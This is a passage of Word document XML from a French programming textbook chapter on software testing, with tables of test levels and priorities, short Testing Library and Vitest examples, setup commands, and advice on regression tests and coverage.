        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.102 — Cinq niveaux de test</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208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Niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Portée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Rapidité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Unitaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une fonction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Millisecondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Composant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Un composant rendu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Millisecondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intégration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plusieurs modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secondes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Bout en bout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="263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Parcours complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Manuel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2635"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vérification humaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2219"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un test qui vérifie aussi l'accessibilité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Un test de composant avec Testing Library</w:t>
        <w:br/>
        <w:t>import { render, screen } from "@testing-library/dom";</w:t>
        <w:br/>
        <w:t>import userEvent from "@testing-library/user-event";</w:t>
        <w:br/>
        <w:br/>
        <w:t>test("le panneau s'ouvre au clic", async () =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  document.body.innerHTML = `</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;button aria-expanded="false"&gt;Menu&lt;/button&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;ul hidden&gt;&lt;li&gt;Accueil&lt;/li&gt;&lt;/ul&gt;`;</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  const bouton = screen.getByRole("button", { name: "Menu" });</w:t>
        <w:br/>
        <w:t xml:space="preserve">  await userEvent.click(bouton);</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  expect(bouton).toHaveAttribute("aria-expanded", "true");</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(screen.getByRole("list")).toBeVisible();</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.5 Ce qui mérite un test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tester tout coûte cher et fige le code. Testez les décisions, les calculs, les cas limites et les parcours critiques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.103 — Cinq priorités de test</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44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À tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Pourquoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Calculs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreurs silencieuses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Total, remise, TVA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Cas limites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Sources de bogues</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Vide, zéro, très long</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parcours critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impact commercial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Paiement, connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Correction de bogue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Non-régression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Test ajouté après un défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rendu conditionnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cohérence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>État vide, erreur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un test paramétré couvre plusieurs cas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Couvrir les cas limites</w:t>
        <w:br/>
        <w:t>test.each([</w:t>
        <w:br/>
        <w:t xml:space="preserve">  [[], 0],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  [[{ prix: 10, quantite: 1 }], 10],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  [[{ prix: 10, quantite: 0 }], 0],</w:t>
        <w:br/>
        <w:t>])("total de %j", (lignes, attendu) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  expect(calculerTotal(lignes)).toBe(attendu);</w:t>
        <w:br/>
        <w:t>});</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RÉGRESSION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Défaut réapparu dans une version antérieurement correcte. Un test de régression reproduit le défaut pour garantir qu'il ne revient pas.</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2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>UN TEST ROUGE VAUT MIEUX QU'UN TEST ABSENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un test qui échoue signale un problème réel. Un test qui passe sans rien vérifier donne une fausse assurance. Une assertion doit pouvoir échouer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>32.6 Outillage minimal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un exécuteur de tests suffit pour commencer. Vitest ou Jest pour le code, Testing Library pour le DOM, et Playwright ou Cypress pour les parcours.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois commandes pour démarrer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Installation et exécution</w:t>
        <w:br/>
        <w:t>npm install -D vitest @testing-library/dom</w:t>
        <w:br/>
        <w:t>npx vitest            # mode interactif</w:t>
        <w:br/>
        <w:t>npx vitest run        # une seule exécution, intégration continue</w:t>
        <w:br/>
        <w:t>npx vitest --coverage # rapport de couverture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La couverture indique le pourcentage de lignes exécutées par les tests. Ce n'est pas un objectif en soi : 100 % de couverture n'empêche pas un bogue de logique.</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APRÈS CHAQUE BOGUE CORRIGÉ</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Écrire un test qui reproduit le défaut.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Vérifier qu'il échoue avant la correction.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Corriger.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Vérifier qu'il passe.</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Déboguer suit une méthode : reproduire, isoler, observer, corriger, vérifier.</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pile d'appels indique l'origine exacte de l'erreur.</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point d'arrêt conditionnel cible un cas précis.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test unitaire vérifie une fonction isolée.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cas limites révèlent les bogues les plus fréquents.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Chaque bogue corrigé mérite un test de régression.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couverture mesure l'exécution, pas la qualité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code fonctionne et reste correct. Reste à savoir s'il est rapide : le chapitre suivant mesure et optimise les performances.</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 xml:space="preserve">Exercice 32.1 — Localiser un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   APPLICATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Cannot read properties of null (reading 'value')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
